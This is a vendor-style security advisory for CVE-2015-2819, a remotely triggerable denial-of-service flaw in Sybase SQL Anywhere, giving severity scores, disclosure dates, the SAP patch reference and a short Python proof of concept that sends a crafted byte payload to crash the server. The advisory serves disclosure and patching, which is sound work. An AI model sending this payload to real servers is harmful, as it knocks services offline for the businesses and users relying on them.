ERPSCAN-15-010

Vahagn Vardanyan (ERPScan)

Sep 12, 2014 - 12:00 a.m.

Sybase SQL Anywhere 11 and 16 - DoS

erpscan.io

CVSS2: 5 Medium
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL

EPSS: 0.005 Low
Percentile: 73.6%

Application: Sybase SQL Anywhere 11 and 16
Vendor URL: <http://www.sybase.com>
Bugs: DoS
Reported: 09.12.2014
Vendor response: 10.12.2014
Date of Public Advisory: 15.03.2015
Reference: SAP Security Note 2108161
Authors: Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: DoS [CWE-122]
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2819

Business Risk

It is possible to use a denial of service vulnerability to terminate the process of the vulnerable component. As a result, nobody can use this service, which negatively affects business processes. System downtime also harms business reputation.

Description

An anonymous attacker can use a special request to crash the Sybase SQL Anywhere process on the server.

VULNERABLE PACKAGES

SYBASE SQL Anywhere 12 and 16
Other versions are probably affected too, but they were not checked.

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2108161.

TECHNICAL DESCRIPTION

An anonymous attacker can use a special request to crash the Sybase SQL Anywhere process on the server.

Proof of concept

```python
import socket

PoC = "\x1b\x00\x00\x50\x00\x00\x00\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54" \
      "\x49\x4f\x4e\x4c\x45\x53\x53\x5f\x54\x44\x53\x00\x00\x00\x01\x00" \
      "\x00\x04\x08\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00" \
      "\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33" \
      "\x5f\x70\x72\x69\x6d\x61\x72\x79\x00\x1b\x00\x00\x50\x00\x00\x00" \
      "\x00\x12\x43\x4f\x4e\x4e\x45\x43\x54\x49\x4f\x4e\x4c\x45\x53\x53" \
      "\x5f\x54\x44\x53\x00\x00\x00\x01\x00\x00\x04\x00\x05\x00\x06\x00" \
      "\x00\x01\x02\x00\x00\x03\x01\x01\x04\x08\x00\x00\x00\x00\x00\x00" \
      "\x00\x00\x07\x02\x04\xb1\x08\x11\x6d\x6f\x62\x69\x6c\x61\x32\x33" \
      "\x5f\x70\x72\x69\x6d\x61\x72\x79\x00"

s = socket.socket()
s.settimeout(1)
s.connect((SERVER_IP, SERVER_PORT))
s.send(PoC)
print(PoC)
s.close()
```

Defense

To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services:
